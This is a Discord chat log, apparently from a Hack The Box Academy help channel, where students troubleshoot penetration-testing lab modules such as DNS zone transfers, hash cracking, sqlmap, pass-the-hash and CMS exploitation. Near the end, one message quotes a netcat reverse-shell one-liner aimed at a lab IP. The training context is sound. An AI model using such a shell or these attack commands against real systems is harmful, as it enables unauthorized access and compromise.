#modules

1 messages · Page 144 of 1

undone narwhal
#

if you find nameserver add it to host file

rustic sage
#

omg

#

what is that error?

#

just out of curiosity

sly dome
#

what error

rustic sage
#

the communications error

sly dome
#

time out?

rustic sage
#

yes

livid zephyr
#

module: SQL Essentials, Case5. I ran the following command but the flag was empty. Did I miss something?

sly dome
#

that port in that ip is closed or that ip is not even turned on

rustic sage
sly dome
#

no

sudden blaze
#

@undone narwhal any hints or solutions

sly dome
#

the dns server here is the machine spawned in the exercise

rustic sage
cedar void
#

So does that mean we 'drag and drop' the file into the command line that the RDP session is running in' ?because I did and I am not seeing the file on the target machine.

acoustic owl
sly dome
#

you can check it with a nmap scan over port 53

sly dome
#

the 10.200?

rustic sage
# sly dome the 10.200?

└─$ dig afxr inlanefreight.htb @10.129.42.195
;; communications error to 10.200.60.101#53: timed out

sly dome
#

you have that ip in the hosts file

rustic sage
#

oh

sly dome
#

pointing to inlanefreight.htb

#

change to the new ip spawned

rustic sage
#

i feel stupid, thank you

acoustic owl
#

Always delete all unnecessary entries from the hosts file.

sly dome
#

dont feel@

undone narwhal
sly dome
#

we are all have been there

rustic sage
#

wait, i got that in the parrot instance

#

how

#

just let me try my host file, I'll look again

sudden blaze
#

@undone narwhal thx

sly dome
#

not the path

rustic sage
#

yeah not the issue:

my hosts file:

#Custom
10.90.60.80    foophoneels.com
10.129.142.95   unika.htb
10.129.121.206    s3.thetoppers.htb thetoppers.htb
10.129.168.221    ignition.htb
10.129.95.184    base.htb
sly dome
#

i dont see inlanefreight.htb

rustic sage
#

right, but then it wouldnt be direected to that third ip either

#

and I got that within the parrot instance

#

as well

sly dome
#

the dns server is the ip spawned

rustic sage
#

ok

sly dome
#

check with nmap

#

if u want to

rustic sage
#

I know that

sly dome
#

point inlanefreight.htb to that ip in the hosts file

#

then you will be able to to a zone transfer

sly dome
acoustic owl
sly dome
#

for me it wasnt working

#

with only the ip

#

needed the domain name

cedar void
# sly dome copy and paste the .exe

I clicked on the mouse button and selected copy and then paste and it still copied the path. I tried cut and paste and it still copied the path

acoustic owl
sly dome
#

idk hahaha

#

for me it wasnt working without the hosts file entry

acoustic owl
#

it works perfect

sly dome
rustic sage
#

yeah it is working, it was the hosts file

acoustic owl
#

You only need the entry in the hosts file if you specify a domain instead of the IP. But then your system must resolve the IP first. So additional DNS requests are necessary.

rustic sage
#

I'm confused about the error, but the solution is correct

rustic sage
#

yeah, I still dont understand where the third ip came from

sly dome
#

for me it wasnt resolving

cedar void
sly dome
#

since it seems an IP from the exercises

acoustic owl
#

This is the Standard Hosts File from the PwnBox

sly dome
#

as i said

#

for me it wasnt working

white ore
#

Hello Guy, i am confused on the Nessus Skills Assessment.

I primarily used my own VM to SSH with htb-student credentials, after login, i checked the Nessus service but it returned this Unit nessusd.service could not be found.

Any clarification about this Navigate to the web interface at the end of this section and log in with the provided credentials.

sly dome
#

and i remember it perfectly xD

#

i always use my own VM

rustic sage
sly dome
#

you can get into the nessus dashboard through https in your browser

#

port 8834 (?)

acoustic owl
sly dome
#

the same you did

#

dig axfr domain @DNSserverIP

jaunty pewter
#

Hi, can anyone help me ?

acoustic owl
#

The printscreen above has just been made now.

sly dome
#

idk how they set it up

#

but from my vm wasnt working

#

which is weird

#

ive never used pwnbox tho

acoustic owl
acoustic owl
sly dome
#

what more can i say here xD

white ore
sly dome
#

i just told you what happened to me

sly dome
#

apart from that is the same

sudden blaze
#

@undone narwhal are u still trying?

jaunty pewter
acoustic owl
acoustic owl
sly dome
#

i dont know, its ok

rustic sage
sly dome
#

probably some conflict

#

with etc hosts and actual DNS server

jaunty pewter
novel matrix
#

Let me fix ya name

compact patrolBOT
jaunty pewter
#

😊 thx

#

@novel matrix thx

acoustic owl
rustic sage
sly dome
#

thats why im thinking it was some conflict

#

from somewhere it was calling to that 10.200 ip

sly dome
rustic sage
#

I think it has to be something like that, some bug in the terminal parsing perhaps

livid zephyr
sly dome
#

ignore some of my headers, i copypasted the request from Edge

livid zephyr
#

I see, you use the '*' after the 1.

sly dome
#

sqlmap should detect it automagically but yeah

#

i like to add it if i know where is the injection point

#

for the flag string, i think the risk option is the key here

#

but i also used level=5

#

its a kitty

#

and the prompt is powerlevel10k

rustic sage
#

alright, before I was able to finish the error returned and I can't get it to go away. I've spawned to instances of the dns server and also tried just working from the pwnbox. I'm not really sure what's wrong, but I do know for certain now that isn't a complete response.

┌─[us-academy-3]─[10.10.14.113]─[htb-ac-187154@htb-yqg1e9isbd]─[~]
└──╼ [★]$ dig afxr inlanefreight.htb @10.129.13.128



; <<>> DiG 9.18.12-1~bpo11+1-Debian <<>> afxr inlanefreight.htb @10.129.13.128

;; global options: +cmd

;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 794

;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1



;; OPT PSEUDOSECTION:

; EDNS: version: 0, flags:; udp: 1232

;; QUESTION SECTION:

;afxr.                IN    A



;; AUTHORITY SECTION:

.            86400    IN    SOA    a.root-servers.net. nstld.verisign-grs.com. 2023102200 1800 900 604800 86400



;; Query time: 6 msec

;; SERVER: 1.1.1.1#53(1.1.1.1) (UDP)

;; WHEN: Sun Oct 22 15:42:03 BST 2023

;; MSG SIZE  rcvd: 108



;; communications error to 10.129.13.128#53: timed out

;; communications error to 10.129.13.128#53: timed out

;; communications error to 10.129.13.128#53: timed out

;; no servers could be reached
glossy gust
#

guys i need a roadmap for bug bounty for web

acoustic owl
acoustic owl
rustic sage
acoustic owl
rustic sage
#

I posted in community help... is there a better avenue?

acoustic owl
#

Support usually does not read here

rustic sage
#

hey guys

#

is anyone able to help under the footprinting IPMI module?

#

accounts cleartext password

rustic sage
#

i cannot crack this hash at all

sly dome
#

you are not meant to do brute force methid

#

method

rustic sage
#

oh?

sly dome
#

use the common wordlist

rustic sage
#

oh in metasploit?

sly dome
#

brute force is for HP ipmi’s

sly dome
rustic sage
#

i wasnt bruteforcing it

#

im using a seclists wordlist

#

but it doesnt match

#

im wondering if its my hashcat query

#

|| hashcat -m150 -a 0 hash.txt passwordlist.txt ||

#

thats what im using

sly dome
#

its crackable with rockyou

rustic sage
#

yeah im using rockyou

#

thats what it looks like

sly dome
#

double check hash

#

you are using rockyou-20 🤦‍♂️

rustic sage
#

ive used all of them

sly dome
#

skill issue them

#

then

vapid arch
#

Anyone have completed zipping ??

sly dome
vapid arch
#

I am stuck at uploading part

sly dome
#

brute force attack ≠ dictionary attack

#

@rustic sage

vapid arch
#

K

rustic sage
#

you legend

sly dome
#

didnt you use all?

#

🤣

rustic sage
#

yeah under seclists

#

seclists didnt have rockyou.txt it was only like 20-25-30 etc

#

thanks a bunch dude!

vapid arch
sly dome
sly dome
rustic sage
#

which module is this? ill see if i can do it on a pwnbox

prime stirrup
#

DACL ATTACKS I

rustic sage
#

oh nevermind thats T3 rip

sly dome
#

first locate the library with find

#

check if exists on the system

#

if exists is a PATH problem

prime stirrup
sly dome
#

try ldconfig

prime stirrup
#

tried that earlier, didn't helped

sly dome
#

echo $LD_LIBRARY_PATH

#

what returns

prime stirrup
#

ah, it return empty

sly dome
#

yea

#

export it with the desired path

#

and im reading that library is no longer prepacked in any linux

#

the pth-net has to be kind of old

#

idontknow

prime stirrup
#

so doing that path thing fixed it for that specific lib, but now new one:

./pth-net 
bin/net: error while loading shared libraries: libnetapi.so.0: cannot open shared object file: No such file or directory
#

yeah, pth-net is like 9 years old but reliable way to pass the hash with net rpc etc.

#

I can't also find a alternate way to pass the hash to add a user to a group

fathom pendant
#

There are some other tools like crackmap iirc and impacket that allow pth

hallow kiln
#

what module is this even?

hallow kiln
#

thanks! missed that

#

haven't done it, but I'd just try a different tool like Marcie said

sly dome
#

me 2

prime stirrup
#

even trying with mimikatz to spawn shell with this user fails

hallow kiln
prime stirrup
#

oh haven't checked it out, thanks

hallow kiln
#

it's a great tool, though sounds like not used or mentioned in the module

prime stirrup
#

amazing, it worked flawlessly @hallow kiln. Thank you so much!

rustic sage
#

Hello everyone. So i decided to continue with https://academy.hackthebox.com/module/77/section/859. I did th enumeration, found login and password to admin, then used MSFCONSOLE and chose the right exploit: unix/webapp/get_simple_cms_upload_exec.i set password, rhosts, username, lhost and when i run exploit i just get
[-] 10.129.172.75:80 - Exploit aborted due to failure: no-access: 10.129.172.75:80 - Authentication failed

any idea why?

#

btw. TARGETURI was already set, i suppose that it's correct

hallow kiln
wary tendon
#

can anyone nudge me in the right direction to find the answer to this quetion "Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio."

#

i am in as root on the linux01

#

have gone to tmp dir

rustic sage
#

well, I've moved a bit forward, seems like the targeturi was indeed wrong :D, sometimes asking helps even when you don't get the answer

hallow kiln
undone narwhal
wary tendon
hallow kiln
sly dome
#

been looking a little at bloodyAd

#

cant figure out how it worked but impacket didn’t

hallow kiln
#

tbh I don't know how you'd add someone to a group with impacket, never done it

glossy wedge
#

Can any1 help me im doing the VULNERABILITY ASSESSMENT module. I have to do a nessus scan. But i don't want to wait for it finish. The module says that there is a file with all the data needed. But i can't find it anywhere.

hallow kiln
#

it tells you which address you need to visit in the browser

sly dome
#

ldap_shell.py

hallow kiln
sly dome
#

me neither but bloody rely on it

#

🤣

hallow kiln
#

makes sense lmao

#

bloodyAD is great though, nice and intuitive

prime stirrup
#

bloodyAD is using python ldap module to send the add user to group query

naive wadi
hallow kiln
#

that I've used at some point, still prefer bloodyAD

rustic sage
#

does anyone know, if the module with getsimple CMS web has broken the "upload files and / or images.." i've been trying like for 30 mins, but no pop up nothing for file upload appears

sly dome
#

ooo

sly dome
#

there is the diference

#

gonna try it out

naive wadi
rugged imp
#

Hi all, I need a steer please on 'Web Attacks - Chaining IDOR Vulnerabilities' - I've hit a brick wall trying to script something to enumerate users, and when I use the web_admin uuid etc to get the flag, I can't get that either, so if some kind soul would kindly point me in the right direction I'd be very grateful. Thanks in advance!

coarse void
hallow kiln
sly dome
#

just use your eyes

#

they are in front of you after login in

glossy wedge
hallow kiln
#

I told you, it tells you which address to visit in the browser

sly dome
#

follow module instructions

glossy wedge
sly dome
#

i mean for you to do custom scan you have to also log in

#

it’s everything done through the web app

#

its not a cli tool

#

think its used by not knowledgeable people

#

they like GUI stuff

glossy wedge
#

yea i get that nessus is throught gui but i just didn't get where to surf to, makes sense now

#

thanks

#

btw what other tool would you recommend? is nessus not proffessional?

hallow kiln
#

I find nessus to be useless, probably good if you've got a license, but none of us do

white ore
rustic sage
rugged imp
# coarse void have you found the admin account

Hi, thanks for replying! I've been using the details in the lesson, but as I haven't cracked the enumeration script that could be the issue as the admin details in the lesson don't get me anywhere.

coarse void
#

Think about how you completed the previous section

tame apex
#

can I get some help please. I started the macOS fundamentials, got this question: Where are the Applications related to the system stored at? I have tried /Applications, Applications, different variations but won't accept it.

rugged imp
coarse void
#

Np

#

Good luck

sly dome
sly dome
#

is a custom fork

sly dome
#

you need manual job done

#

for vulnerability assessment nessus is the king

glossy wedge
#

ok clear.

sly dome
#

but is good to know

#

the software

#

in your professional career there are high chances for you to use it

hallow kiln
#

But if you're at a company doing vulnerability assessments, you'd be using the professional version of Nessus, though you still gotta triage the results after

sly dome
#

this one

#

ippsec used to add user to a group

#

thanks @worthy vigil for telling

#

i forgot about it completely

hallow kiln
#

Yeah, I've used it at some point, I just don't like it 😁

sly dome
#

happens

#

fakk want to finish pivoting module asap

#

want that AD fun

#

but for today is enough

atomic ruin
#

Can I get some quick check on Web Fuzzing Skills assessment? 2nd question, "What are the different extensions accepted by the domains?", can someone just confirm me how many I should have? I think I have the right answer, just want to check if I missed something or just not inputting them right

atomic ruin
#

hum, need to filter something out then. Thank you!

elfin crow
#

no worries

spring viper
#

the thick client stuff is so hard FeelsBadMan

thorn urchin
#

learning raw ldap queries and ldapmodify is rad too

undone mason
#

Hello guys I am pretty new to hackthebox,
I am currently on the last steps of the "Keeper" machine. I have extracted the ppk file and I created an id_rsa from it.
I am trying to do an ssh connection as root with the id_rsa and it keeps asking for a password.
I have also changed the privileges of the id_rsa (chmod 600 id_rsa) and it keeps asking for password.
Anybody has an idea?

hallow kiln
wintry basin
#

Hi everyone, I need help with this question "Enable the http-log output in suricata.yaml and run Suricata against /home/htb-student/pcaps/suspicious.pcap. Enter the requested PHP page as your answer. Answer format: _.php" in Module Working with IDS/IPS. I did find the .php link but I am getting wrong answer message. Maybe I am using the wrong .php link. Can someone give me a little hint please. Thanks

acoustic owl
leaden pond
#

Module: AD Enumeration and Attacks
Section: ACL Abuse Tactics

I run this command given in the module: Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose

I get the response: Unable to find user 'damundsen'

Did anyone else run into this problem?

worthy arrow
#

Did you try Get-ADUser

#

And search for this user if it exists

acoustic owl
#

The user would have to exist. Try to restart the lab

wintry basin
autumn pilot
#

the expected answer is <name>.php no forward slashes and not the full URL/URI

#

Answer format: _.php

leaden pond
#

I restarted the lab and ran into the same issue. Here's the string of commands I've been running. Does anything look off?

wintry basin
acoustic owl
leaden pond
sly dome
thorn urchin
#

unreal = really awesome good thing

sly dome
#

ahh

#

indeed

livid zephyr
#

Method: SQLMAP Essentials, section: Bypasing Web Application Protections, case#8. I tried the following two commands, but didn't work. Why? POST /case8.php

sly dome
livid zephyr
sly dome
#

also the order should be --dump -D testdb -T flag8

sly dome
livid zephyr
# sly dome any

I think I did that same mistake before. I need to remember to add the '*'.

sly dome
#

this worked for me

outer thorn
iron hazel
#

Hi I am in AD Assessment part 2, I have gotten SYSTEM on SQL01. I don't know how to start on MS01.

When I dump LSA hashes on SQL01 I got Administrator and its NT hashes which I could use to evil-winrm to SQL01. I have always wondered these are local administrator and not the AD administrator account right? It is not possible to reuse this NT hash to pth to other machines?

heavy marsh
#

I'm getting the annoying "Warning: Potential security risk ahead" message when using burpsuite even though I've already added the burpsuite certificate. It happened when initially going to the web interface for the target machine too, so I'm wondering if it's a HTB issue rather than burp issue at this point.

#

I guess in this case not a HTB issue, but rather a need for a certificate from HTB.

heavy marsh
# novel matrix Not HTB issue

Okay, never had this issue when I was running kali from a live usb. Now that I'm running in a VM this seems to be an issue. Are there any resources on how to remedy this?

#

Do I need to install a CA certificate from HTB? That's what I had to do with burpsuite.

heavy marsh
#

For the "Shells and Payloads Live Engagement" is there any way to avoid using the foothold machine as the main interface? It is unreasonably slow.

shut wraith
#

BROKEN AUTHENTICATION

Weak Bruteforce Protections

  • I used a short wordlist with the provided python bruting script in the module:
    python3 brute0.py /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt
    This is the error:
    (Please help)

UPDATE:
I tried to include "X-Forwarded-For": "1.2.3.4" Inside of burpsuite and it works but I still cant get a working wordlist for a successful login

heavy marsh
#

Is there any other way to complete the Shells and Payloads section without having to use the supplied RDP machine? It is not functional.

#

To clarify, it responds, but it takes about 10 seconds to respond.

safe marsh
#

hi, is it all right not to follow the sequence of the modules in SOC Analyst Job Role path? I want to finish all "easy" modules first.

shut wraith
#

Couldn't blame u

#

Nowadays everything is labeled one level below the real level

shut wraith
safe marsh
#

all right, might as well abide to the sequence. thanks a lot

fathom pendant
rustic sage
#

anyone here?

novel matrix
heavy marsh
#

How long does the "Request Help" feature take for paying members?

orchid pine
tulip coral
#

Hey goodnight im doing Attacking Common Applications - Skills Assessment I the last question is giving me some trouble can i get a nudge

smoky jackal
#

quick question, I'm doing the windows privilege escalation module, section citrix breakout, its asking me to go to " \10.13.38.95\share" I'm trying to connect to it, used my own VM's IP but still nothing?

fathom pendant
smoky jackal
#

Yeah, I set up a SMB server on the host machine, cant seem to get it to work for some reason

#

if I try connecting to my VM's IP or the IP they gave me I just get this error every time

heavy marsh
#

How does the request help feature work for paying members?

#

It's been almost two hours now and no assistance.

fathom pendant
winged glen
#

Hi, I'm currently doing the Password Attacks module doing the Lab - Hard Section. I can't seem to brute force ||johanna's|| password. I have seen people suggesting to use ||crackmapexec||, which I was already using. I let this thing run for hours today and never got a password. I'm using the mutated password list from earlier in the module, which I've used throughout the module without a problem, so I don't think that's the issue. Here's the command I've been using: || crackmapexec rdp 10.129.16.84 -u johanna -p /home/kali/Documents/htb/passwordAttacks/password_mut.list || I've also tried using the same command with ||smb instead of rdp.|| If anyone has any suggestions, please let me know because I'm not sure what I'm doing wrong.

fathom pendant
#

It'll be YOUR vm's ip

#

10.10.x.x

novel matrix
#

And is still the weekend for most as well

fathom pendant
novel matrix
#

^

fathom pendant
#

I'm not saying the help feature is useless, especially if you're 99% sure you did it right and the lab env is just borked

#

Which happens

novel matrix
fathom pendant
fathom pendant
novel matrix
heavy marsh
#

The foothold box on the Shells and Payload Live Engagement is not functioning. I can interact with it, but everything lags by at least 10 seconds.

#

Was hoping for a viable alternative.

fathom pendant
heavy marsh
fathom pendant
#

There is no real "alternative" mostly because the targets are on a shared internal network with the jump host

#

That's fair considering pivoting isn't discussed until a later module

#

But also consider: is your network stable, are you using udp or tcp for your vpn

#

Are you running on dial-up

fathom pendant
# winged glen Appreciate it

Need to reup my notes but it looks like I was able to get smb perhaps you're missing a flag like -local-auth or something

heavy marsh
fathom pendant
heavy marsh
#

I'll try again tomorrow and see if I get some support by then. Thanks!

smoky jackal
tulip coral
#

so for attacking common applications skill assessment 1 i was able to use the cgi to navigate to the flag but im not able to read the flag... what am i missing?

fathom pendant
smoky jackal
#

@fathom pendant I figured it out, was using it on the wrong vm.. -_-

smoky jackal
#

Completely forgot Im using a VM inside a VM >.>

tulip coral
#

@fathom pendant the command runs because i get a 200 request , but unfortunately the page is blank i checked the source as well . I tried with type/more

fathom pendant
thorn urchin
smoky jackal
#

Using online box, my own vm has internet issues

rustic sage
#

I got the first task, I run the LinEnum.sh script too
but I cannot find any .sh file I could upload my
'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.140 8443 >/tmp/f'|tee -a file.sh
I tried to convert it to php and uploaded in theme .php but it didn't work 😦

smoky jackal
#

@fathom pendant am I entering the command wrong or am I cursed?

#

without sudo I get permission denied

thorn urchin
fathom pendant
#

^

thorn urchin
#

so you run without permissions and it doesnt have proper perms to run, and with perms it cant find it

#

need to install globally or provide the full path

smoky jackal
#

I'm using the box they give you though

thorn urchin
#

so?

fathom pendant
#

locate smbserver.py

thorn urchin
#

sometimes you gotta grease your tools a little to get em to work

fathom pendant
#

^

thorn urchin
#

I had a tool recently I couldnt get its pathing sorted out so Ive resorted to sudo $(which tool) --args

#

lmao

smoky jackal
#

lmao, I located smbclient.py, copied it to my current directory and it still says it cant find it wtf

thorn urchin
#

im not sure why pwnbox even messes with the default impacket paths

smoky jackal
#

actually nvm I'm going insane, I have the .py file in the same directory

thorn urchin
#

./

smoky jackal
#

thank you, it works. my sanity is saved.

thorn urchin
#

on a normal kali vm youd just install impacket and use sudo impacket-smbserver

#

pwnbox gotta be weird about it though

fathom pendant
smoky jackal
#

Yeah, I'm kinda not used to having to manually sort the command out, I'm too use to just having the short cut available.

thorn urchin
#

oh weird

smoky jackal
#

anyways thanks Lee and Mad ^^

fathom pendant
#

@rustic sage don't dm without consent #rules

south glen
#

Hey can anyone help me with Linux fundamentals module's containerization section

#

I m not able to work my way around lxc commands

#

The commands given seems to not work the way they have been described

candid lily
#

can someone help me with logrotate privilege escalation

#

idk how to trigger the logrotation

sly dome
#

copying in a file is an extra step

candid lily
#

nothing seem to happen :( there is no logrotate.conf

#

ok i got it

analog dock
iron hazel
#

Hi I am in AD assessment 2 any nudge for getting into MS01 (question 8)? I have system on SQL01.

fiery berry
tall saffron
#

There will be a more advanced path/cert than the CBBH in a more or less far future, no?

#

since i saw some more "advanced" modules but the price isnt cheap at all

sudden blaze
#

Hello everyone! Facing troubles with network connection - it always disconnects. Module Password Attacks Section:Pass the ticket from linux. Does anyone having same troubles?

#

ping 10.129.240.165
PING 10.129.240.165 (10.129.240.165) 56(84) bytes of data.
^C
--- 10.129.240.165 ping statistics ---
41 packets transmitted, 0 received, 100% packet loss, time 41027ms

sudden blaze
#

Downladed new vpn file tcp and now it doesnt disconnects anymore - but still cant rdp

acoustic owl
sudden blaze
#

it is

#

ping -c 1 10.129.199.218
PING 10.129.199.218 (10.129.199.218) 56(84) bytes of data.
64 bytes from 10.129.199.218: icmp_seq=1 ttl=127 time=37.2 ms

--- 10.129.199.218 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 37.200/37.200/37.200/0.000 ms

#

rdp: now logon failure - suddenly login doesnt work anymore

#

my bad - had wrong pass 😦

cedar void
#

Do I have to ssh into the target machine initially for the sectiomn of this module ? I tried the username and password in the hint and it failed.

acoustic owl
fathom pendant
sudden blaze
#

Modul:Password Attacks Section:Pass the ticket from linux - Network problems- chisel client form MS01 doesnt connets to chisel server -- really annoying

#

On attack box: sudo ./chisel-linux server --reverse On MS01:chisel.exe client 10.10.15.38:8080 R:socks
2023/10/23 05:19:52 client: Connecting to ws://10.10.15.38:8080
2023/10/23 05:20:13 client: Connection error: dial tcp 10.10.15.38:8080: connectex: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.

sudden blaze
#

Why PwnBox - its so slow

#

It should also work without it 😦

acoustic owl
#

Yes, but if there are connection problems, then try the PwnBox

autumn pilot
#

having multiple VPNs being connected to academy won't make the connection faster

sudden blaze
#

The problem with PwnBox is the keyboard - dont have an us keyboard - instead swiss german

#

so cant type there correctly

orchid pine
#

guys am on mssql server right and i dont have the permision to run xp_cmdshell i can only xp_dirtree

#

how can i download afile in this situation

acoustic owl
#

Try to switch the VPN from EU to US or from US to EU. From TCP to UDP or from UDP to TCP. Experiment a bit with the settings.
As dpgg already said. Disable all other VPN connections.

orchid pine
#

in generale like cuz in the module of attacking common services they didnt mention this

#

or am missing it

#

in my notes

#

idk

hallow kiln
#

The modules don't teach you everything there is to know

sudden blaze
#

@acoustic owl with PwnBox it works

#

but why not without it

#

i should work

#

wasted hours of hours of time making it work

acoustic owl
topaz mesa
#

👀

sudden blaze
#

i have protonvpn also running but this shouldnt cause the issue isnt?

#

@acoustic owl what do you mean by disabling all other vpn connections? only have one

acoustic owl
#

Deactivate it and then try again

sudden blaze
#

ok i give it a try

#

doesnt work either

#

even with different vpn files

#

@acoustic owl do you have a prefered vpn file?

acoustic owl
sudden blaze
#

@acoustic owl just wont work, indepentent of wich vpn file i use -- aannooyyiinngg

acoustic owl
sudden blaze
#

Guessing my vpn connection is quite good! Dont live in the mountains :). Dont think thats the issue. Asuming it has to do with the box setup

#

@acoustic owl Maybe you can give it a try? Would really appreciate it

autumn pilot
#

reach out to support via the website

acoustic owl
fathom pendant
#

Probably a select file into outfile type of scenario @orchid pine iirc attacking common services does refer to this

orchid pine
#

select into out file isnt for writing

sudden blaze
#

@acoustic owl thx

quasi jungle
fathom pendant
#

^ ns query isn't really gonna be too helpful for this

quasi jungle
fathom pendant
#

It's not an idea, it's how the answer is structured

#

Lol

quasi jungle
#

was only looking at first level subdomains

fathom pendant
#

If the answer isn't in the first level...

sly dome
#

also relay attack is possible with authentication challenges

hallow kiln
#

there's more you can do but it concerns an active box

sly dome
#

ah !!

#

didnt know

#

talking in modules

hallow kiln
#

it's manager, newest windows AD box, you should check it out

sly dome
#

if its an active box just try harder 🙂

sly dome
#

want to finish and start with prolabs

rustic sage
#

hey guys

hallow kiln
#

I took a break from the modules to do Zephyr, I recommend it

rustic sage
#

can somebody give me an example of: In a first step, the SSH server and client authenticate themselves to each other. The server sends a certificate to the client to verify that it is the correct server. Only when contact is first established is there a risk of a third party interposing itself between the two participants and thus intercepting the connection. Since the certificate itself is also encrypted, it cannot be imitated. Once the client knows the correct certificate, no one else can pretend to make contact via the corresponding server.

#

what would an attack like that look like?

quasi jungle
#

; <<>> DiG 9.18.12-1~bpo11+1-Debian <<>> axfr dev.inlanefreight.htb @10.129.177.237
;; global options: +cmd
; Transfer failed.

#

any idea why this is happening

hallow kiln
rustic sage
#

i want to see what that would look like

fathom pendant
rustic sage
#

and what that type of attack is called

#

is there any place i can read up on it

hallow kiln
#

man-in-the-middle attack

quasi jungle
#

mitm ig

rustic sage
#

thank you! 🙂

sly dome
#

one of them, transfer zone not enabled for your ip

#

or not enabled at all

#

or not a zone

fathom pendant
sly dome
#

axfr risk is that you get the whole network scheme with 1 command xd

quasi jungle
#

btw is there a way to copy stuff into the attackbox

#

since i can only copy out of it but not into it

azure oar
#

@quasi jungle are you using virtualbox or webclient box?

quasi jungle
#

figured it out had to reset target and it worked

azure oar
#

I would copy paste the content of a file and then paste it in the box

quasi jungle
fathom pendant
azure oar
#

clipbox down right

fathom pendant
azure oar
fathom pendant
quasi jungle
#

Yea worked didn't even notice the button

fathom pendant
mint whale
#

Is there anyone here with a vacant spot on their team for me to join in the upcoming Capture The Flag (CTF) competitions? I have prior experience participating in picoCTF and am now looking to challenge myself by participating in the HTBCTF.

#

thanks in advance

fathom pendant
dawn agate
#

I'm currently reviewing my notes, and I have a question regarding "AD Enumeration & Attacks - Skills Assessment Part I" Q2. I found the answer to the question. I ran BloodHound and found several Kerberoastable accounts, but my question is: How do we know that this particular account is the one that should be targeted and will lead to further escalation until reaching the DC? BloodHound doesn't show anything useful, just a list of kerberoastable accounts.

hallow kiln
#

But also, unless you have a reason to not want to generate too many alerts, kerberoast everything 😁

candid lily
#

help python module hijacking

#

the sticky bit is not working

#

oh crap i just realised its not SUID bit

flint chasm
#

Hi All
Could you please help me?
I'm doing Privileged Access in AD module and I'm trying to connect from Win to ssh because I need to use mssqlclinet

#

I don't know how can I connect to this damundsen user with SQL1234! password

#

when I'm trying to connect via ssh there is no connection between 172.16.5.150 address

fathom pendant
flint chasm
#

yeah I'm connected to the target via rdp

#

and on this target I'm trying to connect via ssh to damundsen

#

with 172.16.5.150 IP

fathom pendant
#

This image you provided doesn't support that you're rdp into that target machine

#

Show above where it will either have "spawn target" or the ip

flint chasm
#

one moment because it terminated itself

#

you want a ss with rdp connection?

fathom pendant
#

Sure

flint chasm
#

ok one moment because in this module there are some issues with connection 😉

fathom pendant
#

Try using a different vpn server and the tcp download

flint chasm
flint chasm
#

So I thought that from there I can connect to 172.16.5.15 via ssh

#

but it's not working

fathom pendant
#

Reread the section perhaps

#

You might have missed something

fathom pendant
flint chasm
#

I saw that there is option to connect to 172.16.5.225 htb-student:HTB_@cademy_stdnt! but it also not working

fathom pendant
#

When you type ipconfig, is the system on a 172.16.5 network

flint chasm
#

172.16.5.25

fathom pendant
#

So why would you try to ssh, to your own machine, in this instance

#

Secondly what does the command look like when you're trying to ssh to (what I'm assuming is DC) as damundson

flint chasm
#

ssh user@ip?

#

so in that case ssh damundsen@172.16.5.150?

orchid pine
#

i have a ticket for admin loaded on the klist cmnd how can i use it

#

to do things

fathom pendant
#

Is the ssh on that port, or does the module indicate a different port

flint chasm
fathom pendant
#

The question might tell you

flint chasm
fathom pendant
#

I haven't done this module so I can't tell you what you're doing wrong tbh

flint chasm
#

I'm like trying to do this connection 4 hours and still don't know how can I do it XD

orchid pine
#

hello guys my question is i have a ticket for admi loaded in klist

#

but i cannot acces the admin dir

#

plzzz

fathom pendant
#

Need more context, what module are you doing, what section, are you sure the ticket is valid

orchid pine
#

yeah

small steppe
#

Module: PIVOTING, TUNNELING, AND PORT FORWARDING
Section: Skills Assessment
Question: In previous pentests against Inlanefreight, we have seen that they have a bad habit of utilizing accounts with services in a way that exposes the users credentials and the network as a whole. What user is vulnerable?

Ive been attempting to transfer files to/from || 172.16.5.35 || to my attack host but I haven't been successful. Can someone help shed some light on what Im doing wrong? Ive tried a number of methods that should have otherwise worked (scp, wget, curl, etc) but either files downloaded from || 172.16.5.35 || come back empty or files uploaded from my attack box fail.

fathom pendant
#

I dont see what's not working

#

I see you got a return for ls /

#

¯_(ツ)_/¯

#

I dont see a file.txt in that root directory?

#

Yeah lol

#

You did ls /

#

Does the output you see have a file.txt?

#

You mean the one after the #?

#

2

#

Now I see

#

¯_(ツ)_/¯

#

Haven't done this module so can't tell you how you're being dumb

#

Usually the case

rich wraith
#

I know that if I cancel my student subscription, I lose access to the incomplete modules, but if I buy the student subscription again, the incomplete modules wont be restored, right?

fathom pendant
#

That's probably a better question for support tbh, but I wouldn't think so

acoustic owl
rich wraith
#

okay thank you, I will ask them then

tall saffron
#

No you dont lose access to anything 😉

acoustic owl
#

Without a subscription, he only has access to completed or purchased modules.

sly dome
#

this is the txt for the flag after the GIF8 kek

tall saffron
acoustic owl
leaden yew
#

For Command Injections: Advanced Command Obfuscation, I'm attempting to find a way to make $(a="WhOaMi";printf %s "${a,,}") work (not the question, just the exercise), but I'm not able to get it work.
I've attempted to replace the ; as well as the spaces, but nothing outputs with regards to the whoami command. Can anyone assist?

late urchin
#

Stuck on the Intro to Assembly Language - Data Movement module. No matter what I try, I keep getting a wrong answer

"Add an instruction at the end of the attached code to move the value in "rsp" to "rax". What is the hex value of "rax" at the end of program execution? "

spring moon
#

Any hints on this question? Please

By examining the logs located in the "C:\Logs\PowershellExec" directory, determine the process that injected into the process that executed unmanaged PowerShell code. Enter the process name as your answer.

#

from
Windows Event Logs & Finding Evil Mini-Module
skill assessment

late urchin
#

I figured it out lol was doing mov rax, rsp which was wrong.

wintry basin
undone narwhal
leaden yew
undone narwhal
#

replaced with what?

leaden yew
undone narwhal
#

how about you dont use it at all?

leaden yew
#

?

undone narwhal
#

hint: ||new-line||

leaden yew
leaden yew
undone narwhal
#

There could be, but thats how i did it

leaden yew
glacial dragon
#

In the questions section

#

It says

#

Vhosts needed for these questions:
App.inlanefreight.local
Dev.inlanefreight.local

#

And I'm not sure what to do😬

woven copper
#

add those to /etc/hosts pointing to the IP , example

